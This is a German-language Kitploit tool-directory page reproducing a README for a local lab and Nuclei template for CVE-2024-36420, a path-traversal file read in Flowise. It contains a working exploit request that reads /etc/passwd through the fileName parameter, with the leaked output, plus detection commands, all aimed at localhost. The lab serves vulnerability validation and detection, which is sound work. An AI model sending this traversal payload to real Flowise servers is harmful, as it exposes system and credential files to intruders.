Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
POC_CVE-2024-36420 — Lokales Reproduktionslabor und Nuclei-Vorlage für CVE-2024-36420, eine Schwachstelle zum beliebigen Dateilesen in Flowise über einen nicht bereinigten fileName-Parameter. Validiert das anfällige (1.4.3) und das gepatchte (3.1.2) Verhalten. | Kitploit
Tools/GitHubGitHub/fineman999/poc_cve-2024-36420
SchwachstellenanalyseExploitationWebanwendungs-ExploitationFuzzingLernen & BildungLabs & Praxis
GitHubfineman999/poc_cve-2024-36420

POC_CVE-2024-36420

Lokales Reproduktionslabor und Nuclei-Vorlage für CVE-2024-36420, eine Schwachstelle zum beliebigen Dateilesen in Flowise über einen nicht bereinigten fileName-Parameter. Validiert das anfällige (1.4.3) und das gepatchte (3.1.2) Verhalten.

Repository anzeigen
1vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

POC_CVE-2024-36420

Lokales Reproduktionslabor und nuclei-Vorlagenentwurf für CVE-2024-36420, das Flowise betrifft.

Zusammenfassung

CVE-2024-36420 ist ein beliebiges Dateilesen in Flowise, verursacht durch nicht bereinigte Verwendung des fileName-Body-Parameters in:

  • POST /api/v1/openai-assistants-file

Dieses Labor wurde verwendet, um Folgendes zu validieren:

  • anfälliges Verhalten auf flowiseai/flowise:1.4.3
  • verweigertes Verhalten auf neuerem flowiseai/flowise:3.1.2

Referenzen

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  • GitHub Security Lab: https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/
  • Dateien

    • docker-compose.yml
    • docker-compose.latest.yml
    • CVE-2024-36420.yaml

    Anfälliger Test

    Starte Flowise 1.4.3:

    root@kitploit:~
    docker compose down -v
    docker compose up -d
    docker compose logs --tail=100 flowise
    

    Manuelle Überprüfung:

    root@kitploit:~
    curl -i \
      -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
      -H 'Content-Type: application/json' \
      -d '{"fileName":"../../../../etc/passwd"}'
    

    Beobachtete anfällige Antwort:

    root@kitploit:~
    HTTP/1.1 200 OK
    Content-Disposition: attachment; filename=passwd
    ...
    root:x:0:0:root:/root:/bin/ash
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    ...
    

    Überprüfung der neueren Version

    Starte neuere Flowise 3.1.2:

    root@kitploit:~
    docker compose -f docker-compose.latest.yml down -v
    docker compose -f docker-compose.latest.yml up -d
    docker compose -f docker-compose.latest.yml logs --tail=100 flowise
    

    Manuelle Überprüfung:

    root@kitploit:~
    curl -i \
      -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
      -H 'Content-Type: application/json' \
      -d '{"fileName":"../../../../etc/passwd"}'
    

    Beobachtete Antwort der neueren Version:

    root@kitploit:~
    HTTP/1.1 401 Unauthorized
    {"error":"Unauthorized Access"}
    

    Nuclei

    Validieren Sie die Vorlage:

    root@kitploit:~
    nuclei -duc -validate -t CVE-2024-36420.yaml
    

    Führen Sie gegen das anfällige Ziel aus:

    root@kitploit:~
    nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml
    

    Erwartetes Verhalten:

    • 1.4.3: Übereinstimmung
    • 3.1.2: keine Übereinstimmung

    Hinweise

    • Der Versionsunterschied ist akzeptabel, da dieses Repository nur beobachtetes Verhalten behauptet:
      • anfällig auf 1.4.3
      • verweigert auf 3.1.2
    • Es behauptet nicht die genaue Grenze der gepatchten Version.
    • Es wurden keine realen Ziele verwendet.
    Tool herunterladen